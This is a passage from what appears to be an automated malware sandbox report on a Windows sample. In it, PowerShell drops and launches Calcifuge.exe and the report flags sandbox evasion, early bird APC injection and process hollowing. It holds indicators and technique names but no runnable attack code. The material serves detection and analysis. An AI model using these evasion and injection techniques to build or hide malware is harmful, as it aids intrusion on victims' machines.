      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EAB8A push edx; iretd 1_2_098EAB51
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EAB90 push edx; iretd 1_2_098EAB51
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC352 push ecx; iretd 1_2_098EC4B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E92B6 push edi; ret 1_2_098E92B7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098ED4A6 push ebp; ret 1_2_098ED4AF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC4BA push ecx; iretd 1_2_098EC4B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E34E1 pushad ; ret 1_2_098E34F1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC47D push ecx; iretd 1_2_098EC4B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E8F92 push ss; ret 1_2_098E8F95
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E37A7 push 00000025h; retf 1_2_098E37A9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EA7FC push cs; retf 1_2_098EA89E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EDFFA push edx; iretd 1_2_098EE018
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E4E25 push ebp; iretd 1_2_098E4E37
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166C352 push ecx; iretd 6_2_0166C4B8
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166A7FC push cs; retf 6_2_0166A89E
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166DFFA push edx; iretd 6_2_0166E018
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_016637A7 push 00000025h; retf 6_2_016637A9
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166AB8A push edx; iretd 6_2_0166AB51
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_01668F92 push ss; ret 6_2_01668F95
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166AB90 push edx; iretd 6_2_0166AB51
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166C47D push ecx; iretd 6_2_0166C4B8
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_01664E25 push ebp; iretd 6_2_01664E37
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166503F push ds; iretd 6_2_0166505E
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_016634E1 pushad ; ret 6_2_016634F1
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166C8E1 push es; iretd 6_2_0166C8E8
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166D4A6 push ebp; ret 6_2_0166D4AF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Calcifuge.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeAPI/Special instruction interceptor: Address: 1AA96DA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6360Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3292Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exe TID: 7828Thread sleep count: 35 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exe TID: 7828Thread sleep time: -350000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000001.00000002.1986896418.000000000587E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\^q
      Source: powershell.exe, 00000001.00000002.1986896418.000000000587E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\^q
      Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: Calcifuge.exe, 00000006.00000002.2918740581.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388099706.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423966470.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446693739.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480466093.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492229148.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560467511.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2503220096.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2435085911.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171207372.00000000023A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000001.00000002.1986896418.000000000587E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\^q
      Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeAPI call chain: ExitProcess graph end nodegraph_0-3121
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeAPI call chain: ExitProcess graph end nodegraph_0-3127
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Calcifuge.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Calcifuge.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Calcifuge.exe base address: 400000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Calcifuge.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Calcifuge.exe "C:\Users\user\AppData\Local\Temp\Calcifuge.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
